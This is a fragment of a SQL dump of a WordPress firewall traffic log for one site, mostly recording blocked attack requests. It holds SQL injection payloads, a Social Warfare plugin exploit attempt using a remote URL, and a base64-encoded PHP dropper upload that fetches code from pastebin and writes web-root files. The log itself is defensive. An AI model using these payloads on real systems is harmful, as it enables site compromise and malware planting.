Injection','{\"learningMode\":0,\"failedRules\":\"3\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tyZWRpcmVjdF90b10=\",\"paramValue\":\"aHR0cHM6Ly9jb21wYW55cmVnaXN0cmF0aW9uLm9ubGluZS9hbm51YWwtcmV0dXJucy8xMTExMTExMTExMTExJyBVTklPTiBTRUxFQ1QgQ0hBUig0NSwxMjAsNDksNDUsODEsNDUpLENIQVIoNDUsMTIwLDUwLDQ1LDgxLDQ1KSxDSEFSKDQ1LDEyMCw1MSw0NSw4MSw0NSksQ0hBUig0NSwxMjAsNTIsNDUsODEsNDUpLENIQVIoNDUsMTIwLDUzLDQ1LDgxLDQ1KSxDSEFSKDQ1LDEyMCw1NCw0NSw4MSw0NSksQ0hBUig0NSwxMjAsNTUsNDUsODEsNDUpLENIQVIoNDUsMTIwLDU2LDQ1LDgxLDQ1KSxDSEFSKDQ1LDEyMCw1Nyw0NSw4MSw0NSksQ0hBUig0NSwxMjAsNDksNDgsNDUsODEsNDUpIC0tIC8qIG9yZGVyIGJ5ICdhcyAvKg==\",\"path\":\"L3dwLWxvZ2luLnBocA==\",\"category\":\"sqli\",\"ssl\":1}'),(8139,1564715873.892699,1564715873.561400,'\0\0\0\0\0\0\0\0\0\0%5',0,403,0,0,0,'https://companyregistration.online/wp-login.php?redirect_to=https%3A%2F%2Fcompanyregistration.online%2Fannual-returns%2F1111111111111%27+UNION+SELECT+CHAR%2845%2C120%2C49%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C50%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C51%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C52%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C53%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C54%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C55%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C56%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C57%2C45%2C81%2C45%29+--+%2F%2A+order+by+%27as+%2F%2A',NULL,'Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0','blocked:waf','SQL Injection','{\"learningMode\":0,\"failedRules\":\"3\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tyZWRpcmVjdF90b10=\",\"paramValue\":\"aHR0cHM6Ly9jb21wYW55cmVnaXN0cmF0aW9uLm9ubGluZS9hbm51YWwtcmV0dXJucy8xMTExMTExMTExMTExJyBVTklPTiBTRUxFQ1QgQ0hBUig0NSwxMjAsNDksNDUsODEsNDUpLENIQVIoNDUsMTIwLDUwLDQ1LDgxLDQ1KSxDSEFSKDQ1LDEyMCw1MSw0NSw4MSw0NSksQ0hBUig0NSwxMjAsNTIsNDUsODEsNDUpLENIQVIoNDUsMTIwLDUzLDQ1LDgxLDQ1KSxDSEFSKDQ1LDEyMCw1NCw0NSw4MSw0NSksQ0hBUig0NSwxMjAsNTUsNDUsODEsNDUpLENIQVIoNDUsMTIwLDU2LDQ1LDgxLDQ1KSxDSEFSKDQ1LDEyMCw1Nyw0NSw4MSw0NSkgLS0gLyogb3JkZXIgYnkgJ2FzIC8q\",\"path\":\"L3dwLWxvZ2luLnBocA==\",\"category\":\"sqli\",\"ssl\":1}'),(8140,1564715870.842149,1564715870.351300,'\0\0\0\0\0\0\0\0\0\0%5',0,403,0,0,0,'https://companyregistration.online/wp-login.php?redirect_to=https%3A%2F%2Fcompanyregistration.online%2Fannual-returns%2F1111111111111%27+UNION+SELECT+CHAR%2845%2C120%2C49%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C50%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C51%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C52%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C53%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C54%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C55%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C56%2C45%2C81%2C45%29+--+%2F%2A+order+by+%27as+%2F%2A',NULL,'Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0','blocked:waf','SQL Injection','{\"learningMode\":0,\"failedRules\":\"3\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tyZWRpcmVjdF90b10=\",\"paramValue\":\"aHR0cHM6Ly9jb21wYW55cmVnaXN0cmF0aW9uLm9ubGluZS9hbm51YWwtcmV0dXJucy8xMTExMTExMTExMTExJyBVTklPTiBTRUxFQ1QgQ0hBUig0NSwxMjAsNDksNDUsODEsNDUpLENIQVIoNDUsMTIwLDUwLDQ1LDgxLDQ1KSxDSEFSKDQ1LDEyMCw1MSw0NSw4MSw0NSksQ0hBUig0NSwxMjAsNTIsNDUsODEsNDUpLENIQVIoNDUsMTIwLDUzLDQ1LDgxLDQ1KSxDSEFSKDQ1LDEyMCw1NCw0NSw4MSw0NSksQ0hBUig0NSwxMjAsNTUsNDUsODEsNDUpLENIQVIoNDUsMTIwLDU2LDQ1LDgxLDQ1KSAtLSAvKiBvcmRlciBieSAnYXMgLyo=\",\"path\":\"L3dwLWxvZ2luLnBocA==\",\"category\":\"sqli\",\"ssl\":1}'),(8141,1564715869.124721,1564715868.667100,'\0\0\0\0\0\0\0\0\0\0%5',0,403,0,0,0,'https://companyregistration.online/wp-login.php?redirect_to=https%3A%2F%2Fcompanyregistration.online%2Fannual-returns%2F1111111111111%27+UNION+SELECT+CHAR%2845%2C120%2C49%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C50%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C51%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C52%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C53%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C54%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C55%2C45%2C81%2C45%29+--+%2F%2A+order+by+%27as+%2F%2A',NULL,'Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0','blocked:waf','SQL Injection','{\"learningMode\":0,\"failedRules\":\"3\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tyZWRpcmVjdF90b10=\",\"paramValue\":\"aHR0cHM6Ly9jb21wYW55cmVnaXN0cmF0aW9uLm9ubGluZS9hbm51YWwtcmV0dXJucy8xMTExMTExMTExMTExJyBVTklPTiBTRUxFQ1QgQ0hBUig0NSwxMjAsNDksNDUsODEsNDUpLENIQVIoNDUsMTIwLDUwLDQ1LDgxLDQ1KSxDSEFSKDQ1LDEyMCw1MSw0NSw4MSw0NSksQ0hBUig0NSwxMjAsNTIsNDUsODEsNDUpLENIQVIoNDUsMTIwLDUzLDQ1LDgxLDQ1KSxDSEFSKDQ1LDEyMCw1NCw0NSw4MSw0NSksQ0hBUig0NSwxMjAsNTUsNDUsODEsNDUpIC0tIC8qIG9yZGVyIGJ5ICdhcyAvKg==\",\"path\":\"L3dwLWxvZ2luLnBocA==\",\"category\":\"sqli\",\"ssl\":1}'),(8142,1564715867.094638,1564715866.787600,'\0\0\0\0\0\0\0\0\0\0%5',0,403,0,0,0,'https://companyregistration.online/wp-login.php?redirect_to=https%3A%2F%2Fcompanyregistration.online%2Fannual-returns%2F1111111111111%27+UNION+SELECT+CHAR%2845%2C120%2C49%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C50%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C51%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C52%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C53%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C54%2C45%2C81%2C45%29+--+%2F%2A+order+by+%27as+%2F%2A',NULL,'Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0','blocked:waf','SQL Injection','{\"learningMode\":0,\"failedRules\":\"3\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tyZWRpcmVjdF90b10=\",\"paramValue\":\"aHR0cHM6Ly9jb21wYW55cmVnaXN0cmF0aW9uLm9ubGluZS9hbm51YWwtcmV0dXJucy8xMTExMTExMTExMTExJyBVTklPTiBTRUxFQ1QgQ0hBUig0NSwxMjAsNDksNDUsODEsNDUpLENIQVIoNDUsMTIwLDUwLDQ1LDgxLDQ1KSxDSEFSKDQ1LDEyMCw1MSw0NSw4MSw0NSksQ0hBUig0NSwxMjAsNTIsNDUsODEsNDUpLENIQVIoNDUsMTIwLDUzLDQ1LDgxLDQ1KSxDSEFSKDQ1LDEyMCw1NCw0NSw4MSw0NSkgLS0gLyogb3JkZXIgYnkgJ2FzIC8q\",\"path\":\"L3dwLWxvZ2luLnBocA==\",\"category\":\"sqli\",\"ssl\":1}'),(8143,1564715865.581689,1564715865.068500,'\0\0\0\0\0\0\0\0\0\0%5',0,403,0,0,0,'https://companyregistration.online/wp-login.php?redirect_to=https%3A%2F%2Fcompanyregistration.online%2Fannual-returns%2F1111111111111%27+UNION+SELECT+CHAR%2845%2C120%2C49%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C50%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C51%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C52%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C53%2C45%2C81%2C45%29+--+%2F%2A+order+by+%27as+%2F%2A',NULL,'Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0','blocked:waf','SQL Injection','{\"learningMode\":0,\"failedRules\":\"3\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tyZWRpcmVjdF90b10=\",\"paramValue\":\"aHR0cHM6Ly9jb21wYW55cmVnaXN0cmF0aW9uLm9ubGluZS9hbm51YWwtcmV0dXJucy8xMTExMTExMTExMTExJyBVTklPTiBTRUxFQ1QgQ0hBUig0NSwxMjAsNDksNDUsODEsNDUpLENIQVIoNDUsMTIwLDUwLDQ1LDgxLDQ1KSxDSEFSKDQ1LDEyMCw1MSw0NSw4MSw0NSksQ0hBUig0NSwxMjAsNTIsNDUsODEsNDUpLENIQVIoNDUsMTIwLDUzLDQ1LDgxLDQ1KSAtLSAvKiBvcmRlciBieSAnYXMgLyo=\",\"path\":\"L3dwLWxvZ2luLnBocA==\",\"category\":\"sqli\",\"ssl\":1}'),(8144,1564715863.006149,1564715862.419100,'\0\0\0\0\0\0\0\0\0\0%5',0,403,0,0,0,'https://companyregistration.online/wp-login.php?redirect_to=https%3A%2F%2Fcompanyregistration.online%2Fannual-returns%2F1111111111111%27+UNION+SELECT+CHAR%2845%2C120%2C49%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C50%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C51%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C52%2C45%2C81%2C45%29+--+%2F%2A+order+by+%27as+%2F%2A',NULL,'Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0','blocked:waf','SQL Injection','{\"learningMode\":0,\"failedRules\":\"3\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tyZWRpcmVjdF90b10=\",\"paramValue\":\"aHR0cHM6Ly9jb21wYW55cmVnaXN0cmF0aW9uLm9ubGluZS9hbm51YWwtcmV0dXJucy8xMTExMTExMTExMTExJyBVTklPTiBTRUxFQ1QgQ0hBUig0NSwxMjAsNDksNDUsODEsNDUpLENIQVIoNDUsMTIwLDUwLDQ1LDgxLDQ1KSxDSEFSKDQ1LDEyMCw1MSw0NSw4MSw0NSksQ0hBUig0NSwxMjAsNTIsNDUsODEsNDUpIC0tIC8qIG9yZGVyIGJ5ICdhcyAvKg==\",\"path\":\"L3dwLWxvZ2luLnBocA==\",\"category\":\"sqli\",\"ssl\":1}'),(8145,1564715852.472388,1564715852.082200,'\0\0\0\0\0\0\0\0\0\0%5',0,403,0,0,0,'https://companyregistration.online/wp-login.php?redirect_to=https%3A%2F%2Fcompanyregistration.online%2Fannual-returns%2F1111111111111%27+UNION+SELECT+CHAR%2845%2C120%2C49%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C50%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C51%2C45%2C81%2C45%29+--+%2F%2A+order+by+%27as+%2F%2A',NULL,'Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0','blocked:waf','SQL Injection','{\"learningMode\":0,\"failedRules\":\"3\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tyZWRpcmVjdF90b10=\",\"paramValue\":\"aHR0cHM6Ly9jb21wYW55cmVnaXN0cmF0aW9uLm9ubGluZS9hbm51YWwtcmV0dXJucy8xMTExMTExMTExMTExJyBVTklPTiBTRUxFQ1QgQ0hBUig0NSwxMjAsNDksNDUsODEsNDUpLENIQVIoNDUsMTIwLDUwLDQ1LDgxLDQ1KSxDSEFSKDQ1LDEyMCw1MSw0NSw4MSw0NSkgLS0gLyogb3JkZXIgYnkgJ2FzIC8q\",\"path\":\"L3dwLWxvZ2luLnBocA==\",\"category\":\"sqli\",\"ssl\":1}'),(8146,1564715850.582619,1564715850.290300,'\0\0\0\0\0\0\0\0\0\0%5',0,403,0,0,0,'https://companyregistration.online/wp-login.php?redirect_to=https%3A%2F%2Fcompanyregistration.online%2Fannual-returns%2F1111111111111%27+UNION+SELECT+CHAR%2845%2C120%2C49%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C50%2C45%2C81%2C45%29+--+%2F%2A+order+by+%27as+%2F%2A',NULL,'Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0','blocked:waf','SQL Injection','{\"learningMode\":0,\"failedRules\":\"3\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tyZWRpcmVjdF90b10=\",\"paramValue\":\"aHR0cHM6Ly9jb21wYW55cmVnaXN0cmF0aW9uLm9ubGluZS9hbm51YWwtcmV0dXJucy8xMTExMTExMTExMTExJyBVTklPTiBTRUxFQ1QgQ0hBUig0NSwxMjAsNDksNDUsODEsNDUpLENIQVIoNDUsMTIwLDUwLDQ1LDgxLDQ1KSAtLSAvKiBvcmRlciBieSAnYXMgLyo=\",\"path\":\"L3dwLWxvZ2luLnBocA==\",\"category\":\"sqli\",\"ssl\":1}'),(8147,1564715848.302914,1564715847.961800,'\0\0\0\0\0\0\0\0\0\0%5',0,403,0,0,0,'https://companyregistration.online/wp-login.php?redirect_to=https%3A%2F%2Fcompanyregistration.online%2Fannual-returns%2F1111111111111%27+UNION+SELECT+CHAR%2845%2C120%2C49%2C45%2C81%2C45%29+--+%2F%2A+order+by+%27as+%2F%2A',NULL,'Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0','blocked:waf','SQL Injection','{\"learningMode\":0,\"failedRules\":\"3\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tyZWRpcmVjdF90b10=\",\"paramValue\":\"aHR0cHM6Ly9jb21wYW55cmVnaXN0cmF0aW9uLm9ubGluZS9hbm51YWwtcmV0dXJucy8xMTExMTExMTExMTExJyBVTklPTiBTRUxFQ1QgQ0hBUig0NSwxMjAsNDksNDUsODEsNDUpIC0tIC8qIG9yZGVyIGJ5ICdhcyAvKg==\",\"path\":\"L3dwLWxvZ2luLnBocA==\",\"category\":\"sqli\",\"ssl\":1}'),(8148,1564716030.712668,1564716030.415900,'\0\0\0\0\0\0\0\0\0\0%5',0,403,0,0,0,'https://companyregistration.online/wp-login.php?redirect_to=https%3A%2F%2Fcompanyregistration.online%2Fannual-returns%2F%22+or+%281%2C2%29%3D%28select%2Afrom%28select+name_const%28CHAR%28116%2C81%2C77%2C106%2C65%2C103%2C108%2C84%2C98%2C84%2C72%2C97%29%2C1%29%2Cname_const%28CHAR%28116%2C81%2C77%2C106%2C65%2C103%2C108%2C84%2C98%2C84%2C72%2C97%29%2C1%29%29a%29+--+%22x%22%3D%22x',NULL,'Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0','blocked:waf','SQL Injection','{\"learningMode\":0,\"failedRules\":\"3\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tyZWRpcmVjdF90b10=\",\"paramValue\":\"aHR0cHM6Ly9jb21wYW55cmVnaXN0cmF0aW9uLm9ubGluZS9hbm51YWwtcmV0dXJucy8iIG9yICgxLDIpPShzZWxlY3QqZnJvbShzZWxlY3QgbmFtZV9jb25zdChDSEFSKDExNiw4MSw3NywxMDYsNjUsMTAzLDEwOCw4NCw5OCw4NCw3Miw5NyksMSksbmFtZV9jb25zdChDSEFSKDExNiw4MSw3NywxMDYsNjUsMTAzLDEwOCw4NCw5OCw4NCw3Miw5NyksMSkpYSkgLS0gIngiPSJ4\",\"path\":\"L3dwLWxvZ2luLnBocA==\",\"category\":\"sqli\",\"ssl\":1}'),(8155,1564804115.527226,1564804115.214600,'\0\0\0\0\0\0\0\0\0\0F=',0,403,0,0,0,'https://mail.companyregistration.online/wp-admin/admin-post.php?swp_debug=load_options&swp_url=http%3A%2F%2Fwww.viamarkt.hu%2Freadme.txt&wpaa=echo+%22h1loo1%22%3B','http://www.google.com.hk','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.90 Safari/537.36','blocked:waf','Social Warfare <= 3.5.2 - Unauthenticated Stored Cross-Site Scripting','{\"learningMode\":0,\"failedRules\":\"136\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tzd3BfdXJsXQ==\",\"paramValue\":\"aHR0cDovL3d3dy52aWFtYXJrdC5odS9yZWFkbWUudHh0\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"xss\",\"ssl\":1}'),(8149,1564716029.133686,1564716028.786500,'\0\0\0\0\0\0\0\0\0\0%5',0,403,0,0,0,'https://companyregistration.online/wp-login.php?redirect_to=https%3A%2F%2Fcompanyregistration.online%2Fannual-returns%2F%27+or+%281%2C2%29%3D%28select%2Afrom%28select+name_const%28CHAR%28116%2C81%2C77%2C106%2C65%2C103%2C108%2C84%2C98%2C84%2C72%2C97%29%2C1%29%2Cname_const%28CHAR%28116%2C81%2C77%2C106%2C65%2C103%2C108%2C84%2C98%2C84%2C72%2C97%29%2C1%29%29a%29+--+%27x%27%3D%27x',NULL,'Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0','blocked:waf','SQL Injection','{\"learningMode\":0,\"failedRules\":\"3\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tyZWRpcmVjdF90b10=\",\"paramValue\":\"aHR0cHM6Ly9jb21wYW55cmVnaXN0cmF0aW9uLm9ubGluZS9hbm51YWwtcmV0dXJucy8nIG9yICgxLDIpPShzZWxlY3QqZnJvbShzZWxlY3QgbmFtZV9jb25zdChDSEFSKDExNiw4MSw3NywxMDYsNjUsMTAzLDEwOCw4NCw5OCw4NCw3Miw5NyksMSksbmFtZV9jb25zdChDSEFSKDExNiw4MSw3NywxMDYsNjUsMTAzLDEwOCw4NCw5OCw4NCw3Miw5NyksMSkpYSkgLS0gJ3gnPSd4\",\"path\":\"L3dwLWxvZ2luLnBocA==\",\"category\":\"sqli\",\"ssl\":1}'),(8156,1564804230.761635,1564804230.194000,'\0\0\0\0\0\0\0\0\0\0F=',0,403,0,0,0,'https://mail.companyregistration.online/wp-admin/admin-ajax.php?action=getcountryuser&cs=2',NULL,'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0','blocked:waf','SQL Injection','{\"learningMode\":0,\"failedRules\":\"3\",\"paramKey\":\"cmVxdWVzdC5ib2R5Wy0tODI5M2UyODlmNTVmMjRiOTNkYWQ3NDFiZWIxNGJkYmUNCkNvbnRlbnQtRGlzcG9zaXRpb246X2Zvcm0tZGF0YTtfbmFtZV0=\",\"paramValue\":\"InBvcGltZyI7IGZpbGVuYW1lPSJzZXR0aW5nc19hdXRvLnBocCINCg0KPHRpdGxlPlZ1bG4hISBwYXRjaCBpdCBOb3chPC90aXRsZT4NCjw\\/cGhwDQpmdW5jdGlvbiBodHRwX2dldCgkdXJsKXsNCgkkaW0gPSBjdXJsX2luaXQoJHVybCk7DQoJY3VybF9zZXRvcHQoJGltLCBDVVJMT1BUX1JFVFVSTlRSQU5TRkVSLCAxKTsNCgljdXJsX3NldG9wdCgkaW0sIENVUkxPUFRfQ09OTkVDVFRJTUVPVVQsIDEwKTsNCgljdXJsX3NldG9wdCgkaW0sIENVUkxPUFRfRk9MTE9XTE9DQVRJT04sIDEpOw0KCWN1cmxfc2V0b3B0KCRpbSwgQ1VSTE9QVF9IRUFERVIsIDApOw0KCXJldHVybiBjdXJsX2V4ZWMoJGltKTsNCgljdXJsX2Nsb3NlKCRpbSk7DQp9DQokY2hlY2sgPSAkX1NFUlZFUlsnRE9DVU1FTlRfUk9PVCddIC4gIi93cC1jb250ZW50L3Z1bG4ucGhwIiA7DQokdGV4dCA9IGh0dHBfZ2V0KCdodHRwczovL3Bhc3RlYmluLmNvbS9yYXcvcGhBTThERkgnKTsNCiRvcGVuID0gZm9wZW4oJGNoZWNrLCAndycpOw0KZndyaXRlKCRvcGVuLCAkdGV4dCk7DQpmY2xvc2UoJG9wZW4pOw0KaWYoZmlsZV9leGlzdHMoJGNoZWNrKSl7DQogICAgZWNobyAkY2hlY2suIjwvYnI+IjsNCn1lbHNlIA0KICBlY2hvICJub3QgZXhpdHMiOw0KZWNobyAiZG9uZSAuXG4gIiA7DQoNCiRjaGVjazIgPSAkX1NFUlZFUlsnRE9DVU1FTlRfUk9PVCddIC4gIi92dWxuLmh0bSIgOw0KJHRleHQyID0gaHR0cF9nZXQoJ2h0dHBzOi8vcGFzdGViaW4uY29tL3Jhdy84ODB1ZmFXRicpOw0KJG9wZW4yID0gZm9wZW4oJGNoZWNrMiwgJ3cnKTsNCmZ3cml0ZSgkb3BlbjIsICR0ZXh0Mik7DQpmY2xvc2UoJG9wZW4yKTsNCmlmKGZpbGVfZXhpc3RzKCRjaGVjazIpKXsNCiAgICBlY2hvICRjaGVjazIuIjwvYnI+IjsNCn1lbHNlIA0KICBlY2hvICJub3QgZXhpdHMiOw0KZWNobyAiZG9uZSAuXG4gIiA7DQoNCkB1bmxpbmsoX19GSUxFX18pOw0KPz4NCg0KLS04MjkzZTI4OWY1NWYyNGI5M2RhZDc0MWJlYjE0YmRiZS0tDQo=\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"sqli\",\"ssl\":1}'),(8150,1564716041.182385,1564716040.809300,'\0\0\0\0\0\0\0\0\0\0%5',0,403,0,0,0,'https://companyregistration.online/wp-login.php?redirect_to=https%3A%2F%2Fcompanyregistration.online%2Fannual-returns%2F99999%22+union+select+unhex%28hex%28version%28%29%29%29+--+%22x%22%3D%22x',NULL,'Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0','blocked:waf','SQL Injection','{\"learningMode\":0,\"failedRules\":\"3\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tyZWRpcmVjdF90b10=\",\"paramValue\":\"aHR0cHM6Ly9jb21wYW55cmVnaXN0cmF0aW9uLm9ubGluZS9hbm51YWwtcmV0dXJucy85OTk5OSIgdW5pb24gc2VsZWN0IHVuaGV4KGhleCh2ZXJzaW9uKCkpKSAtLSAieCI9Ing=\",\"path\":\"L3dwLWxvZ2luLnBocA==\",\"category\":\"sqli\",\"ssl\":1}'),(8152,0.000000,1564732985.352919,'\0\0\0\0\0\0\0\0\0\0G',0,302,0,3,0,'https://companyregistration.online/wp-login.php','https://companyregistration.online/wp-login.php?redirect_to=https%3A%2F%2Fcompanyregistration.online%2Fwp-admin%2F&reauth=1','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.142 Safari/537.36','loginOK',NULL,NULL),(8153,0.000000,1564733456.971823,'\0\0\0\0\0\0\0\0\0\0G',0,200,0,1,0,'https://companyregistration.online/wp-login.php','https://companyregistration.online/wp-login.php?redirect_to=https%3A%2F%2Fcompanyregistration.online%2Fwp-admin%2F&reauth=1','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0','loginFailValidUsername',NULL,NULL),(8151,1564716038.500480,1564716038.092400,'\0\0\0\0\0\0\0\0\0\0%5',0,403,0,0,0,'https://companyregistration.online/wp-login.php?redirect_to=https%3A%2F%2Fcompanyregistration.online%2Fannual-returns%2F99999%27+union+select+unhex%28hex%28version%28%29%29%29+--+%27x%27%3D%27x',NULL,'Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0','blocked:waf','SQL Injection','{\"learningMode\":0,\"failedRules\":\"3\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tyZWRpcmVjdF90b10=\",\"paramValue\":\"aHR0cHM6Ly9jb21wYW55cmVnaXN0cmF0aW9uLm9ubGluZS9hbm51YWwtcmV0dXJucy85OTk5OScgdW5pb24gc2VsZWN0IHVuaGV4KGhleCh2ZXJzaW9uKCkpKSAtLSAneCc9J3g=\",\"path\":\"L3dwLWxvZ2luLnBocA==\",\"category\":\"sqli\",\"ssl\":1}'),(8154,0.000000,1564733467.122082,'\0\0\0\0\0\0\0\0\0\0G',0,302,0,1,0,'https://companyregistration.online/wp-login.php','https://companyregistration.online/wp-login.php','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0','loginOK',NULL,NULL),(8171,0.000000,1565169204.496215,'\0\0\0\0\0\0\0\0\0\0ş%',0,302,0,4,0,'https://companyregistration.online/wp-login.php','https://companyregistration.online/wp-login.php?redirect_to=https%3A%2F%2Fcompanyregistration.online%2Fwp-admin%2F&reauth=1','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36','loginOK',NULL,NULL),(8172,0.000000,1565170217.629607,'\0\0\0\0\0\0\0\0\0\0G',0,200,0,3,0,'https://companyregistration.online/wp-login.php','https://companyregistration.online/wp-login.php?interim-login=1&wp_lang=en_GB','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.142 Safari/537.36','loginOK',NULL,NULL),(8173,0.000000,1565180019.481911,'\0\0\0\0\0\0\0\0\0\0d',0,200,0,0,0,'https://companyregistration.online/xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36','loginFailInvalidUsername',NULL,NULL),(8174,0.000000,1565180019.483300,'\0\0\0\0\0\0\0\0\0\02;',0,200,0,0,0,'https://companyregistration.online/xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36','loginFailInvalidUsername',NULL,NULL),(8175,0.000000,1565180019.482055,'\0\0\0\0\0\0\0\0\0\0',0,503,0,0,0,'https://companyregistration.online/xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(8176,0.000000,1565180019.793248,'\0\0\0\0\0\0\0\0\0\0',0,503,0,0,0,'https://companyregistration.online/xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(8177,0.000000,1565180116.755861,'\0\0\0\0\0\0\0\0\0\0}',0,200,0,0,0,'https://companyregistration.online/xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36','loginFailInvalidUsername',NULL,NULL),(8178,0.000000,1565180208.251436,'\0\0\0\0\0\0\0\0\0\027',0,200,0,0,0,'https://companyregistration.online/xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36','loginFailInvalidUsername',NULL,NULL),(8179,0.000000,1565180208.249865,'\0\0\0\0\0\0\0\0\0\0g9e',0,200,0,0,0,'https://companyregistration.online/xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36','loginFailInvalidUsername',NULL,NULL),(8180,0.000000,1565180256.749149,'\0\0\0\0\0\0\0\0\0\0myF',0,200,0,0,0,'https://companyregistration.online/xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36','loginFailInvalidUsername',NULL,NULL),(8181,0.000000,1565180255.886232,'\0\0\0\0\0\0\0\0\0\0h?',0,200,0,0,0,'https://companyregistration.online/xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 